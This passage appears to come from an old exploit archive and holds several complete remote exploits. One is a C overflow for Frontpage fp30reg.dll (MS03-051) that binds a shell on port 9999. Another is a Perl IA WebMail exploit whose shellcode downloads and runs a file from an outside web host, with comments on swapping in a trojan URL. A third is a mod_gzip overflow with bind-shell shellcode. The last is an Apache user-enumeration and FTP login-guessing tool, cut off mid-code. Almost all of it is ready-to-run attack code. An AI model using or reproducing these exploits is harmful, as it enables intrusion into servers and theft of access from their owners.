if (consc==1) {
the_address= consider[0].a + leak.nop_offset;
printf("Using smallest address 0x%08X (0x%08X)\n",
the_address,consider[0].a);
} else if (consc==2) {
the_address= consider[1].a + leak.nop_offset;
printf("Using second smallest address 0x%08X (0x%08X)\n",
the_address,consider[1].a);
} else {
the_address= consider[2].a + leak.nop_offset;
printf("Using third smallest address 0x%08X (0x%08X)\n",
the_address,consider[2].a);
}
}
break;
case S_HIGHEST:
{
the_address= consider[consc-1].a + leak.nop_offset;
printf("Using highest address 0x%08X (0x%08X)\n",
the_address,consider[consc-1].a);
}
break;
case S_FREQUENT:
{
// already sorted by frequency
the_address= consider[consc-1].a + leak.nop_offset;
printf("Using most frequent address 0x%08X (0x%08X)\n",
the_address,consider[consc-1].a);
}
break;
default:
fprintf(stderr,"ERROR: unknown address strategy selected\n");
return (0);
}
return the_address;
}
// [2003-08-10]
80 MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)
/************************************************** *****************************
Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore
Exploit by Adik netmaniac hotmail kg
Binds persistent command shell on port 9999
Tested on
Windows 2000 Professional SP3 English version
(fp30reg.dll ver 4.0.2.5526)
-[ 13/Nov/2003 ]-
************************************************** ******************************/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")
#define VER "0.1"
/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};
void cmdshell (int sock);
long gimmeip(char *hostname);
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
unsigned char packet[3000],data[1500];
unsigned char ecx[] = "\xe0\xf3\xd4\x67";
unsigned char edi[] = "\xff\xd0\x90\x90";
unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = "\xeb\x10";
printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
" by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
if(argc < 2)
{
printf(" Usage: %s [Target] <port>\n"
" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);
WSAStartup(0x0202, &wsaData);
printf(" Target:\t%s \tPort: %d\n\n",argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = '\x0';
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf(" Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf(" Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf(" Checking for presence of fp30reg.dll...");
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf("[x] Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}
if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
printf(" Found!\n");
else
{
printf(" Not Found!! Exiting...\n");
WSACleanup();
return 1;
}
printf(" Packet injected!\n");
closesocket(sockTCP);
printf(" Sleeping ");
for(s=0;s<13000;s+=1000)
{
printf(". ");
Sleep(1000);
}
printf("\n Connecting to host: %s on port 9999",argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
WSACleanup();
exit(1);
}
printf("\n Dropping to shell...\n\n");
cmdshell(sockTCP);
return 0;
}
/************************************************** *******************************/
void cmdshell (int sock)
{
struct timeval tv;
int length;
unsigned long o[2];
char buffer[1000];
tv.tv_sec = 1;
tv.tv_usec = 0;
while (1)
{
o[0] = 1;
o[1] = sock;
length = select (0, (fd_set *)&o, NULL, NULL, &tv);
if(length == 1)
{
length = recv (sock, buffer, sizeof (buffer), 0);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
length = write (1, buffer, length);
if (length <= 0)
{
printf ("[x] Connection closed.\n");
WSACleanup();
return;
}
}
else
{
length = read (0, buffer, sizeof (buffer));
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
length = send(sock, buffer, length, 0);
if (length <= 0)
{
printf("[x] Connection closed.\n");
WSACleanup();
return;
}
}
}
}
/************************************************** *******************************/
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0)
{
if ((he = gethostbyname(hostname)) == NULL)
{
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
WSACleanup();
exit(1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/************************************************** *******************************/
// [2003-11-13]
80 IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
# - www elitehaven net/ncat.exe (downloaded)
# - c:\nc.exe (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}
$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
sleep(5);
print "Done.\n";
close($victim);
exit;
########################################
## SHELLCODE #
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h] ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h] ; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
################################################## ###################
# [2003-11-19]
80 Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
/*
\ [exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
\ Created by xCrZx crazy_einstein yahoo com /05.06.03/
/
\ Tested on RedHat 8.0 (Psyche) (here is target for it),
/ also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/
\
*/
/*
\
/ Single mode:
\
/ [crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
\
/ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
\ by xCrZx [[email protected]] /05.06.03/
/
\ Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/
\ [!] Connecting to localhost:80
/ [+] Connected!
\ Trying to connect to localhost:2003 port!!! Pray for success!
/ Sleeping at 2 seconds...
\
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
\ Brute mode:
/
\ [crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
\ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/ by xCrZx [[email protected]] /05.06.03/
\
/ Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
\
/ [~] Brutemode activated!
\ .
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/
\
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define STEP 1000
char fmt[] =
"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 8.0 (Psyche)", // disributive info
0xbfffd8f0, // return address in stack
0x42127480, // address of stderr
//shellcode for Linux x86 -> bind shell on 2003 port//
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x 8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x 89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x 14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x 0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\x cd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x b0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80",
/*
special jump instruction (to avoid bad characters in url):
(jump on our shellcode into heap)
movl $0xa1a51baa,%ebx
addl $0x66666666,%ebx
jmp *%ebx
*/
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\x e3"
} };
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void usage(char *prog) {
int i=0;
printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr]
[-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [crazy_einstein] /05.06.03/\n");
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
jmp=targets[trg].jmp;
printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);
printf("\n");
if(brutemode)printf("[~] Brutemode activated!\n");
do {
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("\n[!] Connecting to %s:%d\n",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
if(!brutemode)printf("[+] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcod e));
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
close(sock);
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf(" Trying to connect to %s:%d port!!! Pray for success!\n",victim,shellport);
printf(" Sleeping at 2 seconds...\n");
}
sleep(2);
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_ze ro));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[!] Shell is accessible!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
// [2003-11-20]
80 Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit
/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
* Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* Searching complete.
* 12 users checked
* 2 users found
* Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* Complete.
* 0 ftp accounts found
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("\n Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n Downloaded on www.K-OTIK.com\n\n");
}
int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}
int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}
int attempt(char *argv);
int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}
int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;
char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;
m00();
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}
if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }
if(lfile && (logfile = fopen(lfile, "a")) == 0) {
